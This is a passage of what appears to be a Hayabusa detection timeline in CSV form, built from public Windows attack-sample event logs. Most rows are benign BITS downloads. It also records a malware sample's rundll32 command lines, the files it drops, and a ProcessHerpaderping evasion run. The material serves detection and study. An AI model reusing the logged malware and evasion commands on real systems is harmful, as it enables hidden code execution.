+09:00,MSEDGEWIN10,1,high,Evas,Suspicious Call by Ordinal,,rules/sigma/process_creation/proc_creation_win_susp_rundll32_by_ordinal.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:17.543 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\system32\Rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 7552 | Src PGUID: 747F3D96-51F9-5F93-0000-001003125E00 | Tgt PID: 9116 | Tgt PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:21.695 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\SysWOW64\rundll32.exe"" ""C:\Windows\SysWOW64\shell32.dll"",#44 C:\PROGRA~3\DATAUS~1.DLL 4624665222 | LID: 0x8a619 | PID: 7504 | PGUID: 747F3D96-51FD-5F93-0000-00103B425E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:21.696 +09:00,MSEDGEWIN10,10,low,,Process Access,Src Process: C:\Windows\SysWOW64\rundll32.exe | Tgt Process: C:\Windows\SysWOW64\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 9116 | Src PGUID: 747F3D96-51F9-5F93-0000-0010551E5E00 | Tgt PID: 7504 | Tgt PGUID: 747F3D96-51FD-5F93-0000-00103B425E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:22.066 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\rundll32.exe"" DATAUS~1.DLL f8755 4624665222 rd | Process: C:\Windows\SysWOW64\rundll32.exe | 
User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe C:\PROGRA~3\DATAUS~1.DLL f8755 4624665222 | LID: 0x8a619 | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:22.364 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\data.enc | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 06:58:22.391 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\config.xml | Process: C:\Windows\SysWOW64\rundll32.exe | PID: 8920 | PGUID: 747F3D96-51FE-5F93-0000-0010DC535E00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/Malware/rundll32_cmd_schtask.evtx 2020-10-24 22:15:50.672 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 22:53:41.949 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amaWj.img?w=100&h=100&m=6&tilesize=medium&x=1912&y=840&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 22:53:43.173 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 23:25:16.281 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-24 23:25:17.595 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-25 00:07:57.551 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amczd.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-25 00:07:57.815 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342140454_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-25 05:37:35.394 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1amg5S.img?w=100&h=100&m=6&tilesize=medium&x=2238&y=680&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-10-27 19:17:18.369 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\samir.exe | Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | PID: 21756 | PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-10-27 19:17:18.377 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: c:\Users\bouss\Downloads\ProcessHerpaderping.exe | Tgt Process: samir.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 21756 | Src PGUID: 00247C92-F3AE-5F97-0000-00106ABA0418 | Tgt PID: 21048 | Tgt PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: "".\samir.exe"" | Process: C:\Users\bouss\Downloads\samir.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ProcessHerpaderping.exe ""c:\Program Files\Internet Explorer\iexplore.exe"" .\samir.exe | LID: 0x1478dc6e | PID: 21048 | PGUID: 00247C92-F3AE-5F97-0000-00104EBD0418",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-10-27 19:17:18.397 +09:00,LAPTOP-JU4M3I0E,1,medium,Exec,Suspicious File Characteristics Due to Missing Fields,,rules/sigma/process_creation/proc_creation_win_susp_file_characteristics.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense 
Evasion/DE_ProcessHerpaderping_Sysmon_11_10_1_7.evtx 2020-11-02 03:28:53.729 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:10.144 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:10.448 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:10.667 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:30:11.059 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: SetupBinary | URL: https://oneclient.sfx.ms/Win/Prod/20.169.0823.0008/OneDriveSetup.exe,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-02 03:33:01.610 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 19:55:56.114 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: C:\Users\IEUser\AppData\Local\Temp\{DE1AA2CB-2733-420D-BD53-D15E1761ED0D}-86.0.4240.183_86.0.4240.111_chrome_updater.exe | URL: http://r2---sn-5hnekn7d.gvt1.com/edgedl/release2/chrome/APOVneiKVAxsNCc0oAg3ibQ_86.0.4240.183/86.0.4240.183_86.0.4240.111_chrome_updater.exe?cms_redirect=yes&mh=T1&mip=213.127.67.78&mm=28&mn=sn-5hnekn7d&ms=nvh&mt=1604573655&mv=m&mvi=2&pl=17&shardbypass=yes,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 19:59:25.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 19:59:51.480 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 20:03:04.083 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aHmh2.img?w=100&h=100&m=6&tilesize=medium&x=2005&y=1451&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 
20:03:05.093 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image1.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 20:03:06.197 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/29.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 21:31:12.664 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 21:31:12.941 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-05 21:33:21.719 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aFbhf.img?w=100&h=100&m=6&tilesize=medium&x=2920&y=321&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 00:25:28.955 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification 
Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aIYx8.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 00:25:30.216 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161342940453_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 19:52:28.687 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aKxpG.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-06 23:56:52.824 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-08 00:33:50.498 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19R5M0.img?w=100&h=100&m=6&tilesize=medium&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-08 00:36:30.267 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits 
Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-08 00:36:30.760 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 17:25:00.043 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Font Download | URL: https://fs.microsoft.com/fs/windows/config.json,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 17:28:07.533 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 17:28:08.240 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 20:33:58.291 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aPIV0.img?w=100&h=100&m=6&tilesize=medium&x=1544&y=1092&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 20:33:58.749 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image2.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 20:33:59.731 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: http://blob.weather.microsoft.com:80/static/mws-new/WeatherImages/210x173/32.jpg?a,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 22:29:29.376 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-09 22:29:29.868 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-10 21:35:58.814 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: 
https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-10 21:36:00.732 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-11 21:51:23.040 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: PreSignInSettingsConfigJSON | URL: https://g.live.com/odclientsettings/Prod,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-11 21:51:33.078 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: UpdateDescriptionXml | URL: https://g.live.com/1rewlive5skydrive/ODSUProduction,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.703 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.714 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.718 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.722 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.743 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.748 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 
2020-11-12 00:56:12.752 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.756 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://site-cdn.onenote.net/161350540457_Images/LiveTileImages/MediumAndLarge/Image3.png,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.788 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.794 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.798 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 
https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.802 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB1aUuAd.img?w=100&h=100&m=6&tilesize=medium&x=795&y=190&ms-scale=100&ms-contrast=standard,rules/hayabusa/default/events/BitsClient_Operational/59_BITS-Jobs_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/bits_openvpn.evtx 2020-11-12 00:56:12.899 +09:00,MSEDGEWIN10,59,info,Evas | Persis,Bits Job Created,Job Title: Push Notification Platform Job: 1 | URL: 